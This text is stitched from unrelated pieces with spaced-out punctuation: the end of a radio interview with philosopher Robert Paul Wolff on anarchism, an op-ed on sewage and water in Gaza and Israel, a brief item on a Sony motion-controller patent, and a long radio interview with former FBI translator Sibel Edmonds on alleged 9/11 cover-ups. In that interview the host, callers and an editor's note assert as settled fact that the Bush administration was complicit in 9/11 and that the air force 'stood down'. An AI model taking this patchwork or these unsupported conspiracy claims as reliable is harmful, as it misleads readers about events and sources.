Now the first Rambo movie which is a marvellous movie , First Blood , with Sylvester Stallone , is an example of just that .
Here is this Medal of Honour war hero who comes home from the Vietnam war and is walking along a road , doing absolutely no harm to anyone , and comes into a little town where he is rousted by the local police chief , played by Brian Denehey , who immediately starts giving him a good time and roughing him up and so forth .
Now in a wonderfully ironic way Denehey takes one look at him and says , ' This guy 's trouble ' , and of course Rambo ends up blowing the town up .
But only because he has been unfairly treated and in this situation , it is the police chief who is immediately recognised as the bad guy , and the loner , the outsider , who is immediately recognised as the hero .
That is such a transformation .
Now I have to say if you go far enough back in movies , all the way to the '30s to the great Frank Capra movies , you see something like that , A Man Names Smith , The Man who Went to Washington and so forth , where you see the powers - that - be being the bad guys .
The American Depression had the same impact that the Vietnam war had on people 's belief in authority .
Alan Saunders :
But is this an expression of a sort of underlying , perhaps unconscious , anarchism , or is it just cynicism ?
Robert Wolff :
It 's not cynicism .
I think that 's the wrong description of it .
It 's certainly not organised , thoughtful , systematic philosophical anarchism .
Nothing like that .
What it is , is a deep suspicion of authority claims , and a deep suspicion of authority claims is the starting point for a recognition of the truth of anarchism .
Until you are prepared to recognise that those who are in positions of purported authority have no greater claim on our loyalty or our obedience than anyone else , it 's very hard to think through these issues of authority and autonomy .
Alan Saunders : Critics of your books suggest though that it's not the State that 's the real threat to the autonomy of individuals these days , it 's companies , and even other individuals - think of those Russian oligarchs who simply took over whole sections of the Russian economy after communism collapsed .
The State is sidestepped , and it 's arguably overpowered by forces more powerful than itself .
Robert Wolff :
That 's true .
That 's absolutely true .
I do n't view anarchism as an alternative to a critique of the corporate powers .
I view it as simply a part of a full - scale critique of authority claims and the exercise of authority , frequently the exercise of concealed authority .
One of the ways in which corporations are more menacing than the State is that it 's less obvious to us that our lives are controlled by those corporations than it is that our lives are controlled by the States , and it's the State after all puts people in police uniforms and sends us tax bills and puts us in jail and does all sorts of other obvious controlling things .
And I have n't I must confess , encountered that criticism of my book , but if somebody were to make it , I would agree with it completely .
Alan Saunders :
Let me end by asking you , as a philosopher and anarchist who 's actually retiring from his post this year , do you think philosophers contribute enough to making the world better , or is n't that their job ?
I mean you run a scholarship program for students to go to university in South Africa .
Is that on a continuum with your philosophical and anarchistic ideas or is it simply what you do with another hand ?
Robert Wolff :
No , it 's part of what I think is important .
It took me a while to come to realisation that I needed somehow to combine the theoretical work that I do with an attempt to make the world different .
But I discovered something painful , but important , which is when you 're a philosopher , thinking about everything is just as easy as thinking about something .
So philosophers tend to think about everything , like the entire universe , or maybe all possible worlds , because that 's no harder than thinking about just the corner of the world that I live in .
But when you try to change the world , it takes a tremendous amount of effort to make a tiny change and ten times as much effort to make a slightly bigger change .
Are philosophers doing enough ?
No , philosophers by and large , I 'm embarrassed to say , are a very apolitical lot , as compared with other branches of the academy .
And philosophy in the United States at any rate , it 's not true perhaps in France and other places , but in the United States , philosophers have played very little role in the public life of the society , whereas economists and political scientists and sociologists , have played a major role .
And that I think is a failing of philosophers , it 's not a failing of the field or of the subject , it 's a failing of the people .
And I think it should change .
Alan Saunders : Well Robert Paul Wolff , enjoy your retirement , and thank you very much for joining us .
Robert Wolff :
It was lovely talking to you .
Alan Saunders :
The show , which is of course an autonomous collective , is produced by Kyla Slaven with technical production this week by Michelle Goldsworthy .
I 'm Alan Saunders , and I 'm organising for another Philosopher 's Zone next week .
LEADBELLY SINGS
Take this hammer
The water spouts from a broken pipe , forming a perfect circle before it is dispersed by the wind and falls on the breaking waves of the Mediterranean sea .
It looks like a fountain , but the pipe that runs from the town of Rafah to the sea by Gaza 's border with Egypt contains raw sewage .
It enters the sea by the Swedish Village , so - called because it was built by Swedish UN soldiers in the 1960s .
In the overcrowded village it is impossible to escape the smell of sewage .
The discharge is one of at least a dozen which pollutes the sea off Gaza .
The worst is Wadi Gaza , where a steady flow of raw sewage blackens the sea for kilometres .
The currents in the eastern Mediterranean move northwards , bringing sand from the Nile delta and sewage traces from Gaza to the beaches of Israel .
Gaza 's sewage problem is just one of several environmental issues which affect both Palestinians and Israelis .
Friday 5 June was World Environment Day , and it is appropriate to take a moment to survey the environmental damage around us and ask what can be done to prevent it .
The river Jordan , which once nourished the Jordan valley and some of the world 's oldest towns is a salty and polluted trickle .
Before it was dammed , the river 's flow was 20 times greater .
Downstream , the Dead Sea recedes by a metre every year .
In 20 years , it has lost a third of its surface area .
One of the major sources of water flowing into the Dead Sea is the Kidron river or Wadi Nara , which brings raw sewage from Jerusalem and Bethlehem .
Some Israeli beaches are regularly closed by environmental officials , mainly because of deficiencies in Israel 's sewage network .
However , one cannot discount the human waste which travels from the West Bank via rivers such as the Soreq , Lakhish , Hadera and Alexander .
According to Israel 's Ministry of Environment , 58 million cubic metres of untreated sewage is dumped in the West Bank by Palestinians and settlers each year .
This goes into the ground , where it pollutes aquifers , and into streams which ultimately reach the sea .
The effect of global climate change on the Israel and the occupied Palestinian territory is not yet clear .
The region has suffered five years of drought and some forecasters estimate that temperatures will rise and rainfall will decrease .
It will become much harder to make the desert bloom in such conditions .
Environmental issues affect everyone , yet here they are an unnecessary hostage of the conflict .
It would take a small mental shift to remove environmental issues from the " pending peace process " tray and upgrade them to urgent .
These problems will not go away or wait until the resumption of serious peace talks .
There are environmentalists on both sides of the Green Line who are committed to solving these problems but are frustrated by their colleagues in government who see environmental issues as minor in the grand scheme of the Israeli - Palestinian conflict .
Expensive plans to avert disaster are being investigated and implemented .
Israel is building a further three desalination plants in addition to the two it already has .
A feasibility study is underway into transporting water from the Red Sea into the Dead Sea , via pumps , desalination plants and electricity - generating turbines .
Both schemes rely on using huge amounts of energy to achieve their aims , which may affect global warming .
But it is the simple solutions that appear to be the most difficult , such as supplying water to communities and providing basic sewage treatment .
In 1995 the Joint Water Committee was set up to manage water resources in the occupied Palestinian territory as part of the Oslo accords .
It was an interim committee which was meant to operate by consensus .
Fourteen years later , the committee does not seem temporary and consensus appears to have broken down .
As a result , water networks and sewage treatment plants in the West Bank have not been built .
The World Bank states that Palestinians use one sixth the amount of water that Israelis use per capita .
Scarcity forces some Palestinians to monopolise the small amounts available and others to drill unlicensed wells , putting further pressure on the aquifer .
The blockade on Gaza is also taking its environmental toll on Gaza and southern Israel .
For almost two years , supplies necessary to rehabilitate and upgrade Gaza 's sewage networks and treatment plants have been banned .
Attempts by the international community and the Palestinian Authority to persuade the military authorities to treat the discharge of sewage into the sea from Gaza as an important humanitarian issue have so far failed .
Sewage pumped into the sea is an indefensible waste of water .
If treated , it could be used to recharge the aquifers and prevent their destruction .
The underground water from Gaza comes from the coastal aquifer which stretches along the Mediterranean .
Much of it has been contaminated by sea water intrusion , a problem likely to deteriorate .
UNDP and other members of the international community are trying to carry out projects to improve water and sewage management in the West Bank and Gaza which will improve the environment for everyone .
Among other projects , we hope to connect hundreds of Palestinian homes to a sewage network which will link to a treatment plant in Israel and we have started planning the construction of a sewage treatment plant in Khan Yunis in the Gaza Strip .
Just as environmental damage ultimately affects everyone , the solution is similarly universal .
The theme of World Environment Day is " Your planet needs you " .
Individuals must save water and energy and governments must reach agreements whether at the international climate change conference in Copenhagen in December or at the local level .
Co-ordinated action is possible .
Israel has worked efficiently with the international community and the Palestinian Authority to treat avian flu , fearing that an epidemic in Gaza could affect poultry farmers in Israel .
The environment urgently needs the same affirmative foresight and vision .
Anything less would be irresponsible .
We know about the EyeToy .
We 've seen that motion controller Sony showed at E3 .
But there is another motion controller Sony has been working on .
Advertisement
This new patent filing reveals a Sony motion controller that uses a mapping system to incorporate everyday objects such as " coffee mugs , drinking glasses , books , bottles , etc. " as a motion controller .
In the drawing , those everyday objects are illustrated by that horse - shoe - looking U in the man 's hand .
Basically , this tech appears to allow players to use a variety of real world items in game play .
Advertisement
To map the object , players show it to the camera and rotate it so that the object is captured and saved as a file .
The system can then identify this object and respond to its movements .
The manner in which the object is held can affect game play .
For example , in the illustration below , the object is held " up " which reveals the lightsaber - like sword .
Holding the object down turns the sword " off " .
Sony Patents A Motion Control System That Uses Ordinary Objects As Controllers [ Siliconera ]
Former FBI Translator Sibel Edmonds Calls Current 9/11 Investigation Inadequate
INTERVIEW : Former FBI Translator Sibel Edmonds Calls Current 9/11 Investigation Inadequate by Jim Hogue
" If they were to do real investigations we would see several significant high level criminal prosecutions in this country .
And that is something that they are not going to let out .
And , believe me ; they will do everything to cover this up . "
- Sibel Edmonds , former FBI translator INTRODUCTION : Sibel Edmonds and Behrooz Sarshar , beginning in December of 2001 , began filing reports to their superiors at the FBI .
These reports could lead to the collapse of a corrupt power structure that has a stranglehold on the very institutions that are obligated to control it .
We cannot excuse these institutions , for while they fiddle , they pass death sentences on their own troops , and on the people of Afghanistan and Iraq .
On April 30th , Sibel Edmonds was my guest for 50 minutes on WGDR radio .
What follows is an edited transcript of the interview .
The editing is for the sake of a more readable piece .
Sibel Edmonds is a former FBI translator .
She blew the whistle on the cover -up of intelligence that names some of the culprits who orchestrated the 9/11 attacks .
These culprits are protected by the Justice Department , the State Department , the FBI , the White House and the Senate Judiciary Committee .
They are foreign nationals and Americans .
Ms. Edmonds is under two gag orders that forbid her to testify in court or mention the names of the people or the countries involved .
THE INTERVIEW JH :
The people who have so far been interviewed on this program have all been authors and researchers , and here we have someone who , for the most part , has first - hand information .
Ladies and Gentlemen , your guest is Sibel Edmonds , formerly of the FBI , a translator who joined the FBI shortly after 9/11 .
Ms. Edmonds , what I 'll do is invite you to tell us whatever you would like -- your stint with the FBI -- and what the brouhaha with Ashcroft and company is all about .
SE : I started working for the Bureau immediately after 9/11 and I was performing translations for several languages : Farsi , Turkish , and Azerbaijani .
And I do have top - secret clearance .
And after I started working for the Bureau , most of my translation duties included translations of documents and investigations that actually started way before 9/11 .
And certain documents were being sent that needed to be re-translated for various reasons , and of course certain documents had to be translated for the first time due to the backlog .
During my work there I came across some very significant issues that I started reporting in December of 2001 to the mid-level management within the FBI .
They said to basically leave it alone , because if they were to get into those issues it would end up being a can of worms .
And after I did n't see any response from this mid-level bureaucratic management I took it to higher levels all the way up to [ assistant director ]
Dale Watson and Director Mueller .
And , again , I was asked not to take this any further and just let it be .
And if I did n't do that they would retaliate against me .
At that point , which would be around February 2002 , they came and they confiscated my computer , because , they said , they were suspecting that I was communicating with certain Senate members and taking this issue outside the Bureau .
And , at that point , I was not .
They did not find anything in my computer after they confiscated it .
And they asked me to take a polygraph as to the allegations and reports I 'd made .
I volunteered and I took the polygraph and passed it without a glitch .
They have already confirmed this publicly .
In March 2002 I took this issue to the Senate Judiciary Committee and also I filed it with the Department of Justice Inspector General 's office .
And as per the Senate Judiciary Committee 's request the IG started an expedited investigation on these serious issues ; and they promised the Senate Judiciary Committee that their report for these investigations would be out by fall 2002 latest .
And here we are in April 2004 and this report is not being made public , and they are citing " state privilege " and " national security " for not making this report public .
Three weeks after I went to the Senate Judiciary Committee the Bureau terminated my contract , and they cited " government 's convenience . "
I started working with the Senate Judiciary Committee that was investigating this case , and I appeared before the Inspector General 's office for their investigation several times , and I also requested documents regarding these reports under the Freedom of Information Act ; and they blocked this by citing again the " state secret privilege " and " national security " refusing to make these documents public .
On October 18th 2002 Attorney General Ashcroft came out personally , in public , asserted this rare " state secret privilege " on everything that had to do with my case .
And they cited " diplomatic relations " and certain " foreign relations " that would be " at stake " if I were to take this issue and make it public .
And , since then , this has been acting as a gag on my case .
I testified before the [ 9/11 ] commission on February 11th 2004 , and as I said , I have been waiting for this report that they [ the Attorney General 's office ] have been blocking for a year and a half from becoming public .
The information I requested under the Freedom of Information Act has been blocked for two years .
And I have been campaigning for the past three months trying to get the Senate Judiciary Committee that has the oversight authority and responsibility to start its own public hearings .
However , this request is again being blocked .
Now they [ AG ] are citing this upcoming election as reason .
And here I am .
JH : And it is the Attorney General who is blocking your testimony .
SE : Senator Leahy , on April 8 , 2004 , sent a very strong letter to Attorney General Ashcroft , citing my case stating that he , Senator Leahy , has been asking questions , and has a lot of issues that have not been addressed , and asking AG Ashcroft to come and provide answers .
And AG Ashcroft for the past two years has refused .
So he [ Leahy ] is calling for a public hearing .
However , Senator Hatch , who is the Republican Chairman of the Senate , has been a road block .
And Senator Grassley [ a Republican member of the Senate Judiciary Committee ] went on the record with New York Observer 's Gail Sheehy and said that Senator Hatch is blocking this investigation from taking place and for this public hearing to be held by the Senate Judiciary Committee .
JH : So Hatch has the power to keep Leahy and Grassley ....
SE : Correct .
And now it is becoming a partisan issue .
However , I keep reminding them that this issue is not a new issue that has come out for this election .
This issue has been in the courts for two years and two months now .
JH : I 've watched Hatch perform since the Contra Hearings in the mid 1980s , and I can assure you that for Hatch , everything is a partisan issue .
You have a tough one .
SE : We have to remind the people : Congress has the constitutional obligation and public responsibility to oversee these issues and the Department of Justice 's operations .
That 's why they are elected .
That 's why they are there .
That 's what they are getting paid for .
JH : Do you think that Leahy and Grassley are going to try to plow ahead with this , or do you think that there is a back door deal with Hatch ?
SE : Well .... as far as I see , Senator Leahy has been trying , and it's a strong letter that he issued a few weeks ago .
[ Ms. Edmonds refers here to the GPO's PDF ( Senate - - April 8 , 2004 ; pages s4012-4014 ) regarding Ashcroft 's appearance before the Senate Judiciary Committee in 2003 .
Senator Leahy describes the inaction of Attorney General Ashcroft since their first meeting on September 19th 2001 as a " flagrant avoidance of accountability . " ]
However , I 'm very disappointed with Senator Grassley 's office and his staff members .
They initially were very supportive .
But what I am getting from their office every time I call is , " Well this issue is under the Inspector General , " and that their hands are tied .
And then I press further and ask , " Well , what do you mean , ' our hands are tied ' ?
Who 's tying your hands ?
Untie it .
Let 's get it untied . "
They do n't have any response .
They say , " Well , this issue is very complex , and as you know , it is being investigated . "
And I 'm not seeing any issue being investigated .
What I 'm seeing is that this issue is being covered up , and relentlessly being covered up , in consideration of " state privilege , " which people are calling " the neutron bomb of all privilege . "
JH : I can assure you that there are probably thirty issues just like yours that are being covered up .
And they are allowing reporters , writers , internet contributors , and journalists from around the world to do these investigations , because they know that most Americans will never hear any of that .
But as soon as someone like yourself gets too close to actually finding out who did anything , " state privilege " or something ....
SE : " National security " as a classification .
JH : Why that makes us more secure , to let the people guilty of 9/11 run around free is , of course , the question that no one is willing to deal with .
I have a question having to do with " mid- level " management at the FBI .
Why do you think that mid-level FBI management would care enough to stop you from doing your job ?
SE : This was mainly for the reason of accountability .
As you know , and as the chairman for the 9/11 Commission [ Thomas Kean ] answered during Tim Russert 's show : to this day , not a single person has been held accountable .
And certain issues , yes , they were due to a certain level of incompetence .
But there were certain other issues -- you know they keep talking about this " wall , " and not having communication .
I beg to differ on that , because there are certain instances where the Bureau is being asked by the State Department not to pursue certain investigations or certain people or certain targets of an investigation -- simply citing " diplomatic relations . "
And what happens is , instead of targeting those people who are directly related to these illegal terrorist activities , they just let them walk free .
JH : And they interrogate people who are trying to make voting safe .
SE : And that is hypocritical .
I see people detained for simple INS violations .
On the other hand I have seen several , several top targets for these investigations of these terrorist activities that were allowed to leave the country -- I 'm not talking about weeks , I 'm talking about months after 9/11 .
JH : And there were four major FBI investigations , not counting yours , that were squelched in Phoenix , Minneapolis , Chicago and New York .
SE : Correct .
JH : And yours was even outside of that .
SE : Correct .
JH : So , obviously , we have mid-level FBI people who have been told something .
It was the mid -level FBI people who knew enough to squelch many of these investigations before they went further .
So how did they know to do that ?
Can all of them have been incompetent ?
SE : No. Absolutely not .
JH : So they got the word down from Mueller , probably .
SE : I cannot confirm that for sure , but I can tell you that there is so much involvement , that if they did let this information out , and if they were to hold real investigations -- I 'm not talking about this semi- investigation they 're holding under this " Joint Inquiry " -- the pure show of the 9/11 Commission that has been getting the mass media 's attention .
If they were to do real investigations we would see several significant high level criminal prosecutions in this country .
And that is something that they are not going to let out .
And , believe me ; they will do everything to cover this up .
And I am appalled .
I am really surprised .
I 'm taken back by seeing the mass media 's reaction to this .
They are the window to our government 's operation and what are they doing ?
JH : We 've been screaming about it for a long time .
And it goes on .
SE : And you see many people just turning away from these channels of mass media , and they 're just turning in to alternative providers , because they just see what 's happening .
JH : I have another question : when the gag order was written , it had to do with " diplomatic relations . "
Right ?
SE : That is what Attorney General Ashcroft cited .
JH : Are you allowed to say that it 's the Saudis ?
SE : I can not name any country .
And I would emphasize that it 's plural .
I understand the Saudis have been named because fifteen of the nineteen hijackers were from Saudi Arabia .
However , the names of people from other countries , and semi- legit organizations from other countries , to this day , have not been made public .
JH : And the information that you have been gagged on has to do with that specifically .
SE : Correct .
And specifically with that and their ties to people here in this country today .
JH : I understand why you can't say anything about this , but there are several books out about the Bush ties to the Saudis and the bin Ladens in particular .
And in David Griffin 's book , The New Pearl Harbor , there is a very good synopsis of the ISI , which is the Pakistani intelligence service .
He shows the direct connections between the CIA , the ISI , and Mohamed Atta .
He makes a very convincing case that the Pakistani ISI had been helping to plan 9/11 for a long time .
I do n't imagine that you are allowed to say much about that .
SE : You are correct .
But I can tell you that the issue , on one side , boils down to money - - a lot of money .
And it boils down to people and their connections with this money , and that 's the portion that , even with this book , has not been mentioned to this day .
Because then it starts touching some people in high places .
JH : Can you explain more about what money you are talking about ?
" The most significant information that we were receiving did not come from counter - terrorism investigations , and I want to emphasize this .
It came from counter - intelligence , and certain criminal investigations , and issues that have to do with money laundering operations . "
-- Sibel Edmonds , former FBI translator SE :
The most significant information that we were receiving did not come from counter - terrorism investigations , and I want to emphasize this .
It came from counter - intelligence , and certain criminal investigations , and issues that have to do with money laundering operations .
You get to a point where it gets very complex , where you have money laundering activities , drug related activities , and terrorist support activities converging at certain points and becoming one .
In certain points - and they [ the intelligence community ] are separating those portions from just the terrorist activities .
And , as I said , they are citing " foreign relations " which is not the case , because we are not talking about only governmental levels .
And I keep underlining semi-legit organizations and following the money .
When you do that the picture gets grim .
It gets really ugly .
.... JH : Let me read you a short quote from Dr. Griffin 's book , quoting from War and Globalization : The Truth Behind September 11 by Michel Chossudovsky and ask you to comment on it .
" ... The transfer of money to Atta [ $ 325,000 ] , in conjunction with the presence of the ISI chief in Washington during the week , [ is ] the missing link behind 9/11 ....
The evidence confirms that al - Qaeda is supported by Pakistan 's ISI ( and it is amply documented that ) the ISI owes its existence to the CIA . "
SE : I can not comment on that .
But I can tell that once , and if , and when this issue gets to be , under real terms , investigated , you will be seeing certain people that we know from this country standing trial ; and they will be prosecuted criminally .
JH : Here 's a question that you might be able to answer :
What is al - Qaeda ?
SE : This is a very interesting and complex question .
When you think of al - Qaeda , you are not thinking of al - Qaeda in terms of one particular country , or one particular organization .
You are looking at this massive movement that stretches to tens and tens of countries .
And it involves a lot of sub-organizations and sub-sub - organizations and branches and it's extremely complicated .
So to just narrow it down and say al - Qaeda and the Saudis , or to say it's what they had at the camp in Afghanistan , is extremely misleading .
And we do n't hear the extent of the penetration that this organization and the sub-organizations have throughout the world , throughout their networks and throughout their various activities .
It 's extremely sophisticated .
And then you involve a significant amount of money into this equation .
Then things start getting a lot of overlap -- money laundering , and drugs and terrorist activities and their support networks converging in several points .
That 's what I 'm trying to convey without being too specific .
And this money travels .
And you start trying to go to the root of it and it's getting into somebody 's political campaign , and somebody 's lobbying .
And people do n't want to be traced back to this money .
JH : [ Laughter ] I guess not .
This leads me to think of a beef I have with Seymour Hersh that I 'd like to bring up with you ?
Do you know who he is ?
SE : Yes .
JH : He seems to presume that the U.S. Intelligence Services want to collect the kind of intelligence that you have been gagged from repeating .
I have suggested to him in a letter that there is an alternative to incompetence as to why intelligence does n't get through to where it is supposed to go .
But he 's not interested .
He does n't seem to want to take that step .
SE : Not many people are willing to do that .
JH : But there are a lot of people who have laid out the road map .
SE : But people and your listeners have to go further than that .
I understand this administration and their anti-transparency , anti-accountability and their corrupt attitudes .
But that aside , we are not made of only one branch of government .
We are supposed to have a system of checks and balances .
And I am saying , how about the other two branches ?
And putting the pressure on our representatives in the Senate and the Congress , and the court system .
They should be counter - acting this corruption , but they are sitting there silent .
And they are just an audience , just watching it happen .
Senators Leahy and Grassley and Hatch have the obligation to do that .
It 's not that they can choose not to do it .
They do n't have that luxury .
This needs to be demanded of them .
People need to pick up their phones .
They need to write to these people and say , " You 'd better fulfill your responsibilities . "
JH : And you know what Senator Leahy is going to do ?
He 's going to forward his letter , his Senate testimony , on to us to prove how hard he is working .
SE : I saw a reporter the other day who had just spoken to Senator Leahy .
And Senator Leahy said that , well ... he does n't know what the next step will be .
And it came to the issue of the hearing , and investigating this case , and he basically ended the conversation .
And I think that with a little more pressure from us , from you and from your listeners , we can change that .
JH : Some folks up here think of him as Saint Patrick , I 'm afraid .
Be that as it may , are you aware of the on - line news service , TRUTHOUT ?
SE : I 've heard of it .
JH : There is an article in the April sixth TRUTHOUT by Paul Sperry from WorldNet Daily about you and one of your colleagues ...
SE : Mr. Sarshar ?
JH : Behrooz Sarshar .
SE : He is another translator who worked in the same department as I did .
Mr. Sarshar wanted to make this information public , however he just wanted to go to the Senate Judiciary Committee and receive their support and protection under the whistleblower protection act .
And I facilitated this meeting , and several 9/11 family members and I took Mr. Sarshar to the Senate Judiciary Committee meeting in Senator Grassley 's office .
Mr. Sarshar provided them with detailed information , however , to this day Senator Grassley has not acted upon that , and he passed the buck to the 9/11 Commission .
Next we arranged for a briefing between the 9/11 Commission and Mr. Sarshar , and he went there on February 12th , 2004 and he provided the investigators for the 9/11 Commission , for almost three hours with all the details of the investigation that had to do with the 9/11 terrorist attack .
He gave them the names of certain assets used by the Bureau for at least twelve years .
He gave them contact information for certain agents who were aware of these issues .
And they , themselves , wanted to come and talk about it , but they needed certain protection .
Mr. Sarshar provided them with all this information and where to look for these documents etc. and , to this day , the Senate Judiciary Committee and the 9/11 Commission have been passing this buck back and forth .
So , all this information has been sitting in front of them .
They have not called any of those witnesses introduced by Mr. Sarshar to them .
And during the 9/11 Commission hearing with [ FBI ] Director Mueller , none of these questions were asked .
In fact they did not have any questions for Director Mueller , and they left it at that [ except for the remark by Mr. Ben-Veniste that they should be addressing the translation issues behind closed doors . ]
And " behind closed doors " has become a black hole for me because I have been in these closed door sessions so many times within the Senate , within the Inspector General 's office , within the 9/11 Commission .
And whatever information you are providing them behind these closed doors , you know for sure that that information will stay there and will never get out .
That is why we are demanding to have public hearings with the Senate Judiciary Committee on the Senate floor and open to the public .
JH : Do you think the Ellen Mariani case will help any of this ?
[ Ellen Mariani is a 9/11 widow whose attorney , Philip Berg , is suing the United States under the RICO statute for the death of Mr. Mariani at the WTC . ]
SE : I have read about her case .
But there is another lawsuit : the Motley Rice legal firm that is representing over a thousand family members .
They sent me a subpoena to provide them with a deposition .
And one day before that deposition took place , the government attorneys intervened and asked the court for a hearing and they quashed this subpoena request .
They sent eight heavyweight attorneys from the Department of Justice , and Mr. Ashcroft 's right hand .
And basically put on this show in front of the judge , saying , " Sibel Edmonds , if you were to provide this information , our national security and our state secret privilege and our foreign relations will be destroyed .
Therefore , Your Honor , we want you to quash this subpoena . "
Motley
Rice told the judge that they wanted to ask for information that has already been made public .
The government maintained that even though the information was public , it was still classified .
And Judge Walton granted their request .
JH : There is some hope coming from statements made by former FBI counterintelligence agent I.C.Smith who thinks that 9/11 would have been stopped , had the FBI been allowed to do its job .
He is strongly critical of FBI assistant director Dale Watson .
Do you believe that 9/11 could have been stopped if information like yours had been properly handled ?
SE : At the very least , as early as May / June 2001 , we could have issued a red code alert to the public , and we would have issued this very urgent warning system , which would , in return , have increased our Airport and INS security .
Could we have prevented in 100 % certainty ?
I do n't think anything is that certain .
However , we would have had a very , very good chance for preventing it .
And agent Smith and I , we crossed the same person , because my case has to do with Dale Watson too .
JH : The trouble is : once you make this information public , you mess up the plan .
And if one of the investigations from Phoenix , Chicago , New York , or Minneapolis had been followed through , let alone all four , it would have burst the bubble .
SE : Look , Jim , they had those four pieces you mentioned , and far more than that , believe me , far more than that .
And that has not been made public .
And for them to say that we did not have any specific information is just outrageous .
Because what were they waiting for ?
An affidavit signed by bin Laden ?
JH : " Hey Dumb Ass ! Coming 9/11 ! "
So their statement that they did n't have the information is outrageous .
SE : And they have been backing off from that .
About two weeks before Condoleezza Rice appeared before the 9/11 Commission she made the statement , " We had no specific information . "
And I told the press that that was an outrageous lie .
That was printed on the front page of The Independent [ UK ] and several other papers here .
And what she did during the hearing was very interesting .
She corrected herself saying , " Well , I made a mistake .
I should not have said ' we . '
I should say that I personally did not have specific information . "
And that is exactly what I stated .
" We " includes the FBI , and therefore I can tell you with 100 % certainty that that is an outrageous lie .
Yet the Commission did n't ask , " Well , who is the rest of this ' we ' ? "
JH : They do n't want to know .
SE : No , they do n't want to know .
This is the heart of it .
The attitude of the Senate members has been " See no evil .
Hear no evil .
Just let it go . "
And you can't let that happen .
The only people I have seen who have been truly pushing for the truth are the family members .
All they have asked for are three things .
They want the truth , the facts , the real facts , the straightforward truth .
They want accountability .
And they want us to improve our security .
That 's it .
They have no other agenda .
And now they 're smearing their names .
JH : They 'll never run out of people to smear .
Everybody who talks gets smeared .
SE : I have been given a warning that my turn is coming .
I have been waiting for this for two years and two months , Jim .
And they have not done it to this day , and they have not even denied anything .
But I have been told to expect something to occur soon .
JH : Well , they have to figure out the angle .
[ At this point we opened the lines for callers , as the scheduled time for the interview was drawing to a close . ]
CALLER : But , of course , you are trying to spoil our American Dream .
We want to dream in peace !
What are you doing ?
[ Laughter ]
Let us sleep !
JH : That 's it .
That 's what they 're up to .
CALLER : The depth of that psychology is incredible .
It goes from A to Z through our life cycle .
It 's so disempowering .
It 's so depressing .
Well , thank you for being lunatics out there who are trying to get yourselves shot .
[ Laughter ] JH :
That 's okay .
Anytime .
Just for you .
Bye bye .
SE : Even from people from whom I 've been receiving support , so many times you run across people who say , " Yeah , it 's terrible .
I understand .
And it 's very courageous what you are doing . "
But you know how this thing is .
It 's a boat you can't rock .
And that is what is allowing these people to take everything this far .
We need to stop saying we can't rock this boat when it needs to be rocked .
Listen , we pay for this boat .
We elect this boat .
It 's our money that maintains this boat .
And we are the ultimate boss here .
If this boat or some section of it needs rocking , you bet we have the right and we have the power to do it .
And we have the power to demand it .
Otherwise we are making ourselves powerless .
JH :
And if we do n't do it , we do n't deserve it .
SE : Correct .
2nd CALLER : [ Question re 9/11 stand down of the air defense system ]
SE : I do n't have direct knowledge of it .
And I have been trying to stay within what exactly I know -- the exact truth -- not the conspiracy theories -- no exaggerations -- everything that I know , that I came across that is well documented where I can say , " Pull out this document ; pull out this evidence .
Make this document public ; make that document public . "
However , I have been working with other people who have been trying to address other aspects of this issue .
2nd CALLER : The issue of whether or not they new it was going to happen becomes somewhat moot when you look at the air force stand down .
They new it was going to happen .
Well , who did it then ?
There was a show on TUC [ Time of Useful Consciousness ] radio with ....
JH : Michael Ruppert .
2nd CALLER : Yes .
He went step - by - step of what actually happened with the Air Force stand - down .
It 's so obvious that we 're in some sort of farcical dream , and what [ the previous caller ] said was quite relevant , that most people do n't want to wake up from this .
So I was just curious .
I appreciate your work very much .
And those are the two things that stand out to me -- the Pentagon and the air force stand down .
But what else can you really do at this point than just make a little noise ?
Anyway , thank you for doing what you are doing .
SE : He has a point there .
There are so many questions that they do n't want answered .
And they remain unanswered .
And I 'm afraid they will not be answered unless we have a real investigation .
And to this day there has been no real investigation .
Without this , people cannot just let them wrap it up and say , " OK this is the report from the 9/11 Commission , " where anything that has any value is redacted because it is top secret classified information .
JH : And pretty much all the shoes have dropped .
The evidence at this point is overwhelming , and still nobody seems to be doing anything about it .
2nd CALLER : Right , but if you look at the Warren Commission -- you look at the magic bullet theory -- you know that 's official !
But who buys it ?
What can we do ?
This is going to happen .
They 're going to pull it off because the press wo n't report the truth .
SE : That goes to the heart of the matter :
The media , as I said is the window to the government , and that window has turned into a wall .
JH :
We can have a little more faith in the average person despite what [ the two callers ] say .
I just did an informal survey in southern Virginia in a factory of over a hundred people , and I asked , " Would you be surprised to learn that the Bush Administration was complicit in the 9/11 attacks ? "
100 % responded , " No . "
So it 's not like people are afraid to find out information .
They go through life struggling , working eight hours a day at least .
They do n't believe anything the media or the government tells them any more .
They are able to except the fact that Bush & Co was responsible for 9/11 ; and they do n't care .
They almost expect it .
2nd CALLER : I would have suspected the opposite .
These are emotional issues where people do n't want their bubble burst .
They say , " Well , the government would never kill their own people . "
Psychopaths go oversees and kill people with war machines .
They 're over the notion of patriotism .
And I think that for most people it's hard to make that step .
JH : I 'm not saying they made or did n't make a step .
I 'm just saying that , for these workers , the machinations of government are beyond their concern .
But Ms. Edmonds has to leave shortly ....
2nd CALLER : OK I 'll let you go .
I appreciate very much what both of you have done , and thank you very much .
JH : Ms. Edmonds , thanks for being our guest .
SE : Thank you very much .
I 'm honored to be on your show and I hope I 'll be on again .
And I hope you will able to get Senator Leahy .
I 'd like to be able to have a chat with him .
[ Laughter ] JH : Fat chance .
He withers at the thought .
SE : We 're going to still be pounding .
I 'm preparing this petition , and it's going to be signed by many , many people and I 'm going to be wheeling it in personally to both Senators Leahy and Grassley .
And it will have some level of coverage .
And once they see the cameras and the people , suddenly their personalities change .
It 's like Dr. Jekyll and Mr. Hyde .
They become very sweet .
JH : If you see either one of those two [ Leahy or Grassley ] , I 'd be more than happy to have either one them on - with you .
Let 's see what we can do .
SE : Okay , let 's hope .
Thank you , Jim .
Bye .
EDITOR'S NOTE : Jim Hogue provided the following conclusion to this interview : " The facts reported by Sibel Edmonds and Behrooz Sarshar are incontrovertible .
Result : Silence .
And you must agree to be a part of this silence .
The gag order permeates the White House , the Senate Judiciary Committee , all levels of the FBI , the CIA , the 9/11 Commission , the NSC , the Pentagon , the Republican Party , the Democratic Party , and the mass media .
The media and the White House will next assassinate Miss Edmond 's character , as they have done to others who have n't rolled over and played dead .
Never in the course of human events has so great a story been covered up by so many on the orders of so few .
